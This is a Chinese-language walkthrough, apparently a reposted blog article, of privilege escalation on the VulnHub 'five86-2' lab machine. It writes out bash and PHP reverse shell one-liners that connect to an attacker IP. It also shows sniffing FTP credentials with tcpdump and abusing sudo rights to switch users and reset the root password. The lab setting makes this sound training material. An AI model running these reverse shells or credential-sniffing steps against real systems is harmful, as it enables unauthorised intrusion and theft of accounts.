vulnhub five86-2 靶机渗透(下)

admin 2022年5月24日09:24:10评论40 views字数 793阅读2分38秒阅读模式

上面说到,我们拿下了shell,但是感觉不是那么简单。果然。不是root权限。那就来提权吧。

bash -i >& /dev/tcp/192.168.3.251/4567 0>&1 

反弹shell失败。查看一下用户whoami

vulnhub five86-2 靶机渗透(下)

得换一个反弹shell方法,这里用php

 php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.3.251/4567");'

失败

 php -r '$sock=fsockopen("192.168.3.251",4567);exec("/bin/bash -i <&3 >&3 2>&3");'

成功。

vulnhub five86-2 靶机渗透(下)

这里为什么要反弹shell呢?因为冰蝎终端不好用。顺便练习一下。

www-data用户,咋办。

还记得我们之前爆破的两个帐号不?先看看能不能用。

查看所有用户。

vulnhub five86-2 靶机渗透(下)

说明爆破的那两个帐号是这台服务器的帐号,登录一下。

vulnhub five86-2 靶机渗透(下)

第一个密码错误,只能登录第二个。

vulnhub five86-2 靶机渗透(下)

看看都有啥权限,进程。

vulnhub five86-2 靶机渗透(下)

这个地方其实卡住了,后来去看大佬资料才知道思路,通过tcpdump来嗅探ftp帐号密码。

两条命令,先查看接口

tcpdump -D

抓包

timeout 30 tcpdump -w 30.pcap -i veth3dcf8fa (设置时间,保存文件,接口)

保存后tcpdump -r 参数打开。

vulnhub five86-2 靶机渗透(下)


找到USER PASS。得到paul 帐号,

登录paul帐号

vulnhub five86-2 靶机渗透(下)

查看权限。sudo -l

vulnhub five86-2 靶机渗透(下)

可以无密码执行peter权限下的 /usr/sbin/service

提权到peter帐号。

vulnhub five86-2 靶机渗透(下)

查看一下权限,更大。

vulnhub five86-2 靶机渗透(下)

可以直接运行/usr/bin/passwd ,这就好说了。直接更改root密码

vulnhub five86-2 靶机渗透(下)

提权就到此结束了。但是咋没找到flag文件呢?翻了一会,原来在root目录下。打开就ok。

vulnhub five86-2 靶机渗透(下)

这个靶机到此就渗透结束了。期间借鉴了大佬的思路。不然真的拿不下来。感谢大佬的文章!


原文始发于微信公众号(backdoor):vulnhub five86-2 靶机渗透(下)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月24日09:24:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub five86-2 靶机渗透(下)http://cn-sec.com/archives/781158.html

发表评论

匿名网友 填写信息